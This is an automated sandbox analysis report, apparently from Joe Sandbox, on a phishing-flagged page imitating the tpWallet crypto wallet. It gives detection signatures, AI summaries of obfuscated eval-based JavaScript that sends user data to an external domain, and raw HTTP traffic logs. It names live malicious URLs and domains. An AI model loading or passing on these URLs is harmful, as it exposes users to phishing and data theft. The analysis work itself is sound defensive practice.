Edit tour

Windows Analysis Report
https://www.36fg.com/tp-Related/18104.html

Overview

General Information

Sample URL:https://www.36fg.com/tp-Related/18104.html
Analysis ID:1638988
Infos:

Detection

Score:52
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
AI detected suspicious Javascript
Creates files inside the system directory
Deletes files inside the Windows folder
HTML title does not match URL

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 6892 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 6912 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,16277136169432288041,15609615948761443216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2184 /prefetch:3 MD5: E81F54E6C1129887AEA47E7D092680BF)
    • chrome.exe (PID: 7540 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=printing.mojom.UnsandboxedPrintBackendHost --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2036,i,16277136169432288041,15609615948761443216,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=3220 /prefetch:8 MD5: E81F54E6C1129887AEA47E7D092680BF)
  • chrome.exe (PID: 7752 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.36fg.com/tp-Related/18104.html" MD5: E81F54E6C1129887AEA47E7D092680BF)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://www.36fg.com/tp-Related/18104.htmlAvira URL Cloud: detection malicious, Label: phishing

Phishing

barindex
Source: 0.1.d.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: anonymous function... The script demonstrates high-risk behavior by dynamically executing remote code from an obfuscated and potentially malicious domain, which poses a significant security risk.
Source: 0.2..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://oudngmslhifnsf.gdmgcyy.com/tj.js... This script demonstrates several high-risk behaviors, including dynamic code execution using `eval()`, data exfiltration by sending user data to an external domain, and the use of obfuscated code. The script also attempts to detect and target mobile devices, which is a common tactic for malicious scripts. Overall, this script exhibits a high level of suspicious and potentially malicious behavior.
Source: 0.0..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://www.36fg.com/dgij3ogsjf2ffwg.js... This script demonstrates high-risk behavior by using the `eval()` function to execute dynamic code, which can be used to run malicious scripts. Additionally, the script is obfuscated, making it difficult to analyze and understand its true purpose. The script also appears to be attempting to load a script from a suspicious domain, which could be used for data exfiltration or other malicious activities. Overall, this script exhibits multiple high-risk indicators and should be considered a significant security threat.
Source: https://www.36fg.com/tp-Related/18104.htmlHTTP Parser: Title: tpWallet_tpwallet does not match URL
Source: https://www.36fg.com/tp-Related/18104.htmlHTTP Parser: No favicon
Source: https://www.36fg.com/tp-Related/18104.htmlHTTP Parser: No <meta name="author".. found
Source: https://www.36fg.com/tp-Related/18104.htmlHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 216.58.206.68:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49734 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 156.224.2.38:443 -> 192.168.2.5:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 35.190.80.1:443 -> 192.168.2.5:49791 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: unknownTCP traffic detected without corresponding DNS query: 150.171.28.10
Source: global trafficHTTP traffic detected: GET /tp-Related/18104.html HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static/css/bootstrap.min.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/css/meanmenu.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/css/animate.min.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/css/magnific-popup.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/css/fontawesome-all.min.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/css/owl.carousel.min.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/css/owl.theme.default.min.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/css/scrolltop.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/css/default.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/css/style.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/css/responsive.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /dgij3ogsjf2ffwg.js HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/css/b6f99a7fe7b04da897d26b4ff96c2310.css HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.36fg.com/static/css/style.cssAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/picture/logo-1.png HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/picture/blog-author.png HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /images/defaultpic.gif HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/js/modernizr-3.5.0.min.js HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/js/jquery-1.12.4.min.js HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/js/popper.min.js HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/picture/logo-1.png HTTP/1.1Host: www.36fg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/js/bootstrap.min.js HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/picture/blog-author.png HTTP/1.1Host: www.36fg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /images/defaultpic.gif HTTP/1.1Host: www.36fg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/js/meanmenu.min.js HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/js/magnific-popup.min.js HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/js/owl.carousel.min.js HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/js/waypoints.min.js HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/js/counterup.min.js HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
Source: global trafficHTTP traffic detected: GET /static/js/scrolltop.js HTTP/1.1Host: www.36fg.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.36fg.com/tp-Related/18104.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=qno9ediiiks7rknnfcfm2el0s6
